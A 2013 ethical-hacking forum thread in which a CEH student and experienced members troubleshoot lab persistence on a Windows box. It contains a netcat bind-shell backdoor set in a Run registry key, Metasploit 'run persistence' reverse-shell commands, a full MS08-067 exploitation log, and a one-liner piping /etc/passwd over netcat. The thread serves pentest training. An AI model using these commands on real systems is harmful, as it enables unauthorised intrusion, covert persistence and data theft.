HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 34 guests and 2 members online
 
Advertisement

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Network Pen Testingarrow netcat question
EH-Net
May 19, 2013, 02:36:13 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: netcat question  (Read 2940 times)
0 Members and 1 Guest are viewing this topic.
Dalobo
Newbie
*
Offline Offline

Posts: 27


View Profile
« on: January 27, 2013, 07:45:47 PM »
I spent the last few hours in the lab figuring out how to upload, autorun, and clean up all evidence that I had ever had a backdoor on a Windows box.

But I ran across a few things I could not figure out.

Steps:
Got a meterpreter shell on the victim
Uploaded nc.exe to the system32 folder
Set the regkey for running nc in listening mode at startup
Logged in as the admin on the victim machine
Rebooted the victims server using meterpreter reboot cmd
Waited for windows to reboot
Logged in as admin on the victim server
Connected from BT using nc IP port command

Questions:

1. When in meterpreter, why can I only reboot the remote victims machine when someone is logged in on that machine?
2. Why can I only connect to netcat on the victims machine when someone is logged in on that machine?

What am I doing wrong? Doing it this way just makes me more likely to get caught.

Thank you,

Dalobo
Logged
Dark_Knight
Sr. Member
****
Offline Offline

Posts: 292


View Profile WWW
« Reply #1 on: January 27, 2013, 08:52:04 PM »
Having established a meterpreter session, do you migrate to another process?
« Last Edit: January 27, 2013, 08:56:31 PM by Dark_Knight » Logged
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
Dalobo
Newbie
*
Offline Offline

Posts: 27


View Profile
« Reply #2 on: January 28, 2013, 04:53:47 PM »
No, I did not.  I used the MS08-67 to own the box.  When I typed shell, and then whoami - I think I  got administrator. That would make sense. I was not NT Authority.

I will have to try this again, but see about getting NT Authority. I will let you know once I have time to work on it again

Thank you Dark_Knight.

Dalobo
Logged
ajohnson
Recruiters
Hero Member
*
Offline Offline

Posts: 1056


aka dynamik


View Profile WWW
« Reply #3 on: January 28, 2013, 05:41:23 PM »
You should be SYSTEM with MS08-067, not administrator.

It would help if you post the exact registry key you added and the shutdown/restart command you're trying to use.
Logged
WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
Dalobo
Newbie
*
Offline Offline

Posts: 27


View Profile
« Reply #4 on: January 28, 2013, 06:58:12 PM »
OK.  I redid this and I am nt authority, and the reboot command worked without having me log into the victim as admin.

I am still unable to connect using netcat.

I set the following key using this command

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\currentversion\\RUN -v BackDoor -d c:\\windows\\system32\\nc.exe" -L -d -p 1234 -e cmd.exe"

meterpreter > reboot

Once rebooted, I open a terminal and type:
nc 192.168.5.150 1234

I get connection refused.

I will do some more testing and get back to you.

Thank you,

Dalobo
Logged
superkojiman
Jr. Member
**
Offline Offline

Posts: 59



View Profile WWW
« Reply #5 on: January 28, 2013, 10:01:58 PM »
Is the Windows firewall turned on? Can you check if netcat running and listening on the port you specified after you rebooted?
Logged
OSCP, GSEC
ajohnson
Recruiters
Hero Member
*
Offline Offline

Posts: 1056


aka dynamik


View Profile WWW
« Reply #6 on: January 28, 2013, 10:24:53 PM »
I believe all the "run" registry keys require a user to log in. The "run" under HKLM applies to all users, and the "run" under HKU will only apply to that specific user.

If you haven't played around with it yet, do a run persistence -h inside of a meterpreter session. The -S option will allow you to install a service that should run upon startup.
Logged
WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
Dalobo
Newbie
*
Offline Offline

Posts: 27


View Profile
« Reply #7 on: February 02, 2013, 07:47:06 PM »
I still can't get netcat to connect without a user being logged in.

I did give the persistence a try and can now have meterprrter call home whenever I lose the sessions.  Smiley

I used
Code:
run persistence -S -A -X -i 10 -p 445 -r 192.168.1.10

I am still lost on how an admin would use netcat to control a server. If he has to log into Windows to  be able to make a connection to netcat... then he can control it that way... what is the point of netcat at that time?

Thank you,

Dalobo
Logged
ajohnson
Recruiters
Hero Member
*
Offline Offline

Posts: 1056


aka dynamik


View Profile WWW
« Reply #8 on: February 02, 2013, 08:12:21 PM »
Maybe you can create a netcat service similar to what run persistence does using sc: http://technet.microsoft.com/en-us/library/cc990289(v=ws.10).aspx

There really isn't a practical reason for an admin to use netcat to legitimately administer a server. Remote desktop, psexec, PowerShell, etc. would be used in practice.
Logged
WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
Dalobo
Newbie
*
Offline Offline

Posts: 27


View Profile
« Reply #9 on: February 03, 2013, 07:26:15 AM »
Thanks.  I thought netcat was a way for admins to administer their boxes, without using RDP.  While I understand that is kind of silly for them to do, I just thought that was the "legitimate" purpose of netcat. To be honest, as a pentester, I think I would rather have a meterpreter connection then a netcat connection.

I did have issues where the persistence shell did not call home after a few exits. I will have to play around with it some more.

Will persistence still make a connection back to you when you reboot your attacking box? I would think so, but was unable to get it to work for me.

I am doing all of this testing/learning for my CEH.

Thanks again for all the help,

Dalobo
Logged
ajohnson
Recruiters
Hero Member
*
Offline Offline

Posts: 1056


aka dynamik


View Profile WWW
« Reply #10 on: February 03, 2013, 12:47:55 PM »
I'm sure there's been an admin or two that have tried, but it's really not a good solution. Hopefully they'd at least use socat or cryptcat and have it connect back to their system, not just bind so anyone on the network could access it Wink

There are a lot of legitimate uses for netcat. It's great to do basic network tests (i.e. did the firewall change get implemented correctly?):

Code:
# nc -vv google.com 80

Connection to google.com 80 port [tcp/http] succeeded!

I also use it for copying information over the network where I don't want to setup something like file sharing.
destination: # nc -lp 9999 > goodies.txt
source: # cat /etc/passwd | nc 192.168.1.99 9999

Be sure to familiarize yourself with the netcat cheat sheet: http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf The port relaying stuff is pretty cool too.

And yes, Meterpreter is preferred to netcat from a pen testing perspective, but it's not always feasible or possible. It's important to know how to get around with a basic shell on both *nix and Windows systems.

I'm not sure why you're not receiving a connection upon a reboot. It works for me:

Code:
msf > use exploit/windows/smb/ms08_067_netapi
rhost => 192.168.1.50
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.99:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.99:4444 -> 192.168.1.50:1031) at Sun Feb 03 10:49:22 -0700 2013

meterpreter > run persistence -A -S -X -i 5 -p 443 -r 192.168.1.99
[*] Creating a persistent agent: LHOST=192.168.1.99 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 609700 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\efdfhUSKx.vbs
[*] Agent executed with PID 1200
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Creating service LendDpizgQ
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/XXXXXX-AEF856CC_20130203.5054/clean_up__20130203.5054.rc
meterpreter > [*] Meterpreter session 2 opened (192.168.1.99:443 -> 192.168.1.50:1034) at Sun Feb 03 10:51:03 -0700 2013

Background session 1? [y/N]
msf exploit(ms08_067_netapi) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC  192.168.1.99:4444 -> 192.168.1.50:1031
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC  192.168.1.99:443 -> 192.168.1.50:1034

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > reboot
Rebooting...
meterpreter > exit

[*] Meterpreter session 2 closed.  Reason: User exit
msf exploit(ms08_067_netapi) > [*] Meterpreter session 3 opened (192.168.1.99:443 -> 192.168.1.50:1035) at Sun Feb 03 10:52:04 -0700 2013

msf exploit(ms08_067_netapi) > sessions -K
[*] Killing all sessions...
[*] Meterpreter session 1 closed.
[*] Meterpreter session 3 closed.

msf exploit(ms08_067_netapi) > jobs

Jobs
====

  Id  Name
  --  ----
  0   Exploit: multi/handler

msf exploit(ms08_067_netapi) > [*] Meterpreter session 4 opened (192.168.1.99:443 -> 192.168.1.50:1025) at Sun Feb 03 10:52:44 -0700 2013

Make sure you have your listener (multi/handler) setup and waiting for the connection. run persistence will do this for you with -A, but you'll have to configure it manually if you don't use that. Check the output of netstat -anp tcp on your Windows host to start troubleshooting.

Way to actually get your hands dirty and not just memorize trivia for your CEH Smiley
Logged
WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
hayabusa
Hero Member
*****
Offline Offline

Posts: 1630



View Profile
« Reply #11 on: February 04, 2013, 07:11:40 AM »
Quote from: ajohnson on February 03, 2013, 12:47:55 PM
Way to actually get your hands dirty and not just memorize trivia for your CEH Smiley

^^ +1
Logged
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'

OSCE, OSCP , GPEN, C|EH
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.114 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.